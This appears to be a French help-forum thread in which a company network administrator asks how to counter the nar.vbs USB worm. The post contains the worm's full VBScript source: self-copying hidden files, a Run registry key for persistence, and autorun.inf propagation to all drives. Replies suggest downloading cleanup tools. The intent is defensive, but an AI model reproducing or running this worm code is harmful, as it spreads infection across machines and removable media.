modification de script Fermé

Question

Bonjour a tous...je travaille actuellement sur la gestion d'un reseau internet d'entreprise, probleme le virus nar.vbs ce balade dessus via les ports USB sans que l'on puisse le radier... certain antivirus me le mettent en quarantaine d'autres le detecte mais n'agissent pas,en tout les cas je n'en ai trouver aucun qui le supprime.... j'ai le script de nar.vbs (VOIR PLUS BAS), j'aimerai savoir si un petit genie serais capable de le modifier de sorte a ce qu'il est l'effet inverse de l'actuelle... a savoir que lorsqu'on le supprime manuellement,il s'efface mais des que l'on double clique sur le disque sur lequel il se trouvait pour l'ouvrir un message d'erreur indiquant que le fichier nar.vbs est manquant et donc que le disque ne peut s'ouvrir.Le seul moyen maintenant d'ouvrir le disque en question est le clic droit "open"... j'ai bien evidemment reghoster les stations mais ce villain revient en permanence.... si quelqu'un peut faire quelque chose.... NB : Il cree des cles registres lui permettant de s'initialiser des le demarrage [URL=https://www.casimages.com/][img]http://nsa02.casimages.com/img/2008/09/25/080925022032299497.gif[/img][/URL] Le script : dim TTTTT(2) Set FSO = Createobject("Scripting.FileSystemObject") set OSC = createobject("Wscript.shell") WWW = OSC.ExpandEnvironmentStrings("%systemroot%") REP0 = "C:\Program Files\Internet Explorer\Connection Wizard\icwconn1" set TTT = FSO.getfile(Wscript.ScriptFullname) set TTTT = TTT.openastextstream(1,-2) do while not TTTT.atendofstream MonCode = MonCode & TTTT.readline : MonCode = MonCode & vbcrlf Loop Set TTTT = Nothing Set TTT = Nothing TAMP = OSC.ExpandEnvironmentStrings("%TEMP%") & "\Mso" : TAMPO = TAMP & "\" MonDir = Left(Wscript.ScriptFullname, InStrRev(Wscript.ScriptFullname, "\")) If Len(MonDir) = 3 Then OSC.Run WWW & "\explorer.exe /n, " & MonDir End If If TAMPO <> MonDir Then If Not FSO.FolderExists(TAMP) Then FSO.CreateFolder(TAMP) End If Set TTTT = FSO.Getfolder(TAMP).Files On Error Resume Next NBTT = 0 For Each TTT In TTTT TTT.Attributes = 0 TTT.Delete If Err >0 Then NBTT = NBTT+1 End If Next Set TTTT = Nothing Err.Clear NBFVB = FSO.Getfolder(TAMP).Files.Count If NBFVB < 5 Then For I = NBFVB To 5 MonNom = "~$" & Left(FSO.GetTempName(),6) & ".vbs" MEZANHUN(MonNom) If I < 5 Then Wscript.Sleep 17000 End If Next End If Wscript.Quit End If MonNom = left(FSO.GetTempName(),6) & ".vbs" If Left(MonDir,len(REP0)) <> REP0 then On Error Resume Next If FSO.FolderExists(REP0) then FSO.DeleteFolder REP0 , True E1 = Err : Err.Clear End If FSO.CreateFolder(REP0) : E2 = Err : Err.Clear Rep = REP0 & "\" & Lcase(left(FSO.GetTempName(),4)) & "\" CHREG = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS-" & ucase(left(FSO.GetTempName(),4)) If E2 = 0 then set TTT = FSO.createtextfile(Rep & MonNom,2,true):TTT.write MonCode TTT.close :set TTT = Nothing set TTT = FSO.getfile(Rep & MonNom):TTT.attributes = 39 :set TTT = Nothing OSC.regwrite CHREG,Rep & MonNom End If End If On Error Resume Next DO If FSO.FileExists(TAMPO & "z") Then Set FSO = Nothing : Set OSC = Nothing Wscript.Quit End If MonNom = "MS" & mid(FSO.GetTempName(),3,4) & ".vbs" OtoReune = "[autorun]" & Vbcrlf & "shellexecute=wscript.exe " & MonNom For Each LECTEUR In FSO.Drives Place = LECTEUR.path & "\" & MonNom If (LECTEUR.drivetype =1 OR LECTEUR.drivetype =2) and LECTEUR.path <> "A:" then BID = 0 : BYD = 0 If FSO.FileExists(LECTEUR.Path & "\autorun.inf") Then set TTT =FSO.getfile(LECTEUR.path & "\autorun.inf") set TTTA = TTT.openastextstream(1,-2) TTTTT(0) = TTTA.ReadLine : TTTTT(1) = TTTA.ReadLine set TTTA= Nothing : Set TTT = Nothing Place2 = LECTEUR.Path & "\MS" & Right(TTTTT(1),8) TTTE = "shellexecute=wscript.exe " & "MS" If (TTTTT(0)<>"[autorun]" Or Left(TTTTT(1),27)<> TTTE) then set TTT =FSO.getfile(LECTEUR.path & "\autorun.inf") TTT.attributes = 32 FSO.FileDelete LECTEUR.path & "\autorun.inf" , true set TTT = Nothing Else BID = 1 End If If FSO.FileExists(Place2) then BYD = 1 End If End If If BID = 1 And BYD = 0 Then For Each FVBS In FSO.Getfolder(LECTEUR.Path & "\").Files If Left(FVBS.Name,2) = "MS" And Right(FVBS.Name,4)= ".vbs" Then FVBS.Attributes = 32 : FVBS.Delete true End IF Next set TTT=FSO.createtextfile(Place2,2,true) TTT.Write MonCode : TTT.Close : Set TTT = Nothing set TTT=FSO.getfile(Place2) TTT.attributes = 39 set TTT = Nothing End If If BID = 0 Then For Each FVBS In FSO.Getfolder(LECTEUR.Path & "\").Files If Left(FVBS.Name,2) = "MS" And Right(FVBS.Name,4)= ".vbs" Then FVBS.Attributes = 32 : FVBS.Delete True End IF Next set TTT=FSO.createtextfile(Place,2,true) TTT.write MonCode TTT.close Set TTT = Nothing set TTT=FSO.getfile(Place) TTT.attributes = 39 set TTT = Nothing set TTT=FSO.createtextfile(LECTEUR.path & "\autorun.inf",2,true) TTT.write OtoReune TTT.close Set TTT = Nothing End If set TTT =FSO.getfile(LECTEUR.path & "\autorun.inf") TTT.attributes = 39 set TTT = Nothing End If Next Wscript.Sleep 90000 Loop Wscript.Quit Sub MEZANHUN(CeNom) set TTT = FSO.createtextfile(TAMPO & CeNom,2,True) TTT.write MonCode TTT.close set TTT = Nothing set TTT = FSO.getfile(TAMPO & CeNom) TTT.Attributes = 39 set TTT = Nothing OSC.run WWW & "\system32\wscript.exe " & """" & TAMPO & CeNom & """" ,0 ,False End Sub

jlpjlp · Answer

slt pour virer les infections transitant par les clé usb il y a 1/ # Télécharge RavAntivirus d'Evosla : http://ww25.evosla.com/compteur.php?soft=rav_antivirus # Si tu as une clé USB, disque dur externe, etc, branche-les sans les ouvrir avant de lancer ce FIX # Fais un clic droit sur le fichier .ZIP > Extraire sur > le Bureau # Doucle-clique sur >> RAV.exe << afin de lancer l'outil. # Une fois RAV ANTIVIRUS lancé, laisse-le réagir , il scanne automatiquement tout les lecteurs (disques fixes et amovibles) # Si infection > un log s'établira, sinon le soft affichera (très rapide) ==>Votre Ordinateur est sain . # Retire tes disques amovibles et redémarrez votre ordinateur. # Poste le rapport, si infection! 2/ Télécharge sur le bureau Flash Disinfector (de SUBS) à cette adresse : http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe Double-clique sur l’icône. Les icônes vont disparaître. C’est normal. Si un rapport est généré en cas d'infection, sauvegarde-le sur le bureau, et poste le ensuite Redémarre ensuite le PC. 3 / si cela persiste: télécharge combofix (par sUBs) ici : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et enregistre le sur le bureau. déconnecte toi d'internet et ferme toutes tes applications. désactive tes protections (antivirus, parefeu, garde en temps réel de l'antispyware) double-clique sur combofix.exe et suis les instructions à la fin, il va produire un rapport C:\ComboFix.txt réactive ton parefeu, ton antivirus, la garde de ton antispyware copie/colle le rapport C:\ComboFix.txt dans ta prochaine réponse. Attention, n'utilise pas ta souris ni ton clavier (ni un autre système de pointage) pendant que le programme tourne. Cela pourrait figer l'ordi. Tu as un tutoriel complet ici : https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

Texan33 · Answer

Merci pour cette reponse rapide....
Le gros probleme est que le virus ce balade sur un reseau d'environ 80 machines....
je ne me vois pas faire cette manipulation sur toutes...
j'aurai besoin soit d'un script VBS ou .bat permettant de le contrer et qui soit integrable dans les scripts d'ouverture de session du serveur...
La je fais appel a la creme ;)
D'avance merci...
Et encore merci pour cette rapide premiere reponse...

Modification de script

2 réponses

Discussions similaires